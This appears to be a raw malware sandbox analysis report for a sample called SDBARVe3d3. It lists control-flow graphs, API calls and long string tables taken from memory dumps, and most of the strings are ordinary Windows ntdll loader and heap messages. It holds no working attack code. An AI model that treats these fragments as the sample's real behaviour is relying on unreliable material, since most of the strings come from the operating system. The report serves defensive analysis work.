                                                                                                                                    control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                                                                                                    APIs
                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Load
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2234796835-0

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050134103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_SDBARVe3d3.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0

                                                                                                                                    Control-flow Graph

                                                                                                                                    control_flow_graph 131 1762c0a-1762c0f 132 1762c11-1762c18 131->132 133 1762c1f-1762c26 LdrInitializeThunk 131->133
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2160512332
                                                                                                                                    Strings
                                                                                                                                    • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                                                                                                    • double initialized or corrupted critical section, xrefs: 01795508
                                                                                                                                    • 8, xrefs: 017952E3
                                                                                                                                    • Thread identifier, xrefs: 0179553A
                                                                                                                                    • undeleted critical section in freed memory, xrefs: 0179542B
                                                                                                                                    • corrupted critical section, xrefs: 017954C2
                                                                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                                                                                                    • Invalid debug info address of this critical section, xrefs: 017954B6
                                                                                                                                    • Critical section address., xrefs: 01795502
                                                                                                                                    • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                                                                                                    • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                    • API String ID: 0-2368682639
                                                                                                                                    Strings
                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                                                                                                    • @, xrefs: 0179259B
                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                    • API String ID: 0-2515994595
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                    • API String ID: 0-1700792311
                                                                                                                                    Strings
                                                                                                                                    • VerifierDlls, xrefs: 017A8CBD
                                                                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                                                                                                    • VerifierDebug, xrefs: 017A8CA5
                                                                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                                                                                                    • VerifierFlags, xrefs: 017A8C50
                                                                                                                                    • HandleTraces, xrefs: 017A8C8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    • apphelp.dll, xrefs: 01716496
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                                                                                                    • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
                                                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                    Strings
                                                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
                                                                                                                                    • LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
                                                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 01798170
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5
                                                                                                                                    • LdrpInitializeProcess, xrefs: 0175C6C4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                    Strings
                                                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0175855E
                                                                                                                                    • @, xrefs: 01758591
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01758421
                                                                                                                                    • LdrpInitializeProcess, xrefs: 01758422
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    • .Local, xrefs: 017528D8
                                                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 017921DE
                                                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017921D9, 017922B1
                                                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017922B6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                    Strings
                                                                                                                                    • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01793437
                                                                                                                                    • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01793456
                                                                                                                                    • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0179342A
                                                                                                                                    • RtlDeactivateActivationContext, xrefs: 01793425, 01793432, 01793451
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                    Strings
                                                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01781028
                                                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01780FE5
                                                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017810AE
                                                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0178106B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                    Strings
                                                                                                                                    • apphelp.dll, xrefs: 01742462
                                                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0178A992
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0178A9A2
                                                                                                                                    • LdrpDynamicShimModule, xrefs: 0178A998
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0173327D
                                                                                                                                    • HEAP[%wZ]: , xrefs: 01733255
                                                                                                                                    • HEAP: , xrefs: 01733264
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $@
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                    Strings
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0178A121
                                                                                                                                    • LdrpCheckModule, xrefs: 0178A117
                                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 0178A10F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 017982DE
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017982E8
                                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 017982D7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                    Strings
                                                                                                                                    • @, xrefs: 017DC1F1
                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017DC1C5
                                                                                                                                    • PreferredUILanguages, xrefs: 017DC212
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                    • API String ID: 0-1373925480
                                                                                                                                    Strings
                                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017A4888
                                                                                                                                    • LdrpCheckRedirection, xrefs: 017A488F
                                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 017A4899
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                    • API String ID: 0-3154609507
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                    • API String ID: 0-2558761708
                                                                                                                                    Strings
                                                                                                                                    • LdrpInitializationFailure, xrefs: 017A20FA
                                                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 017A20F3
                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017A2104
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                    • API String ID: 0-2986994758
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
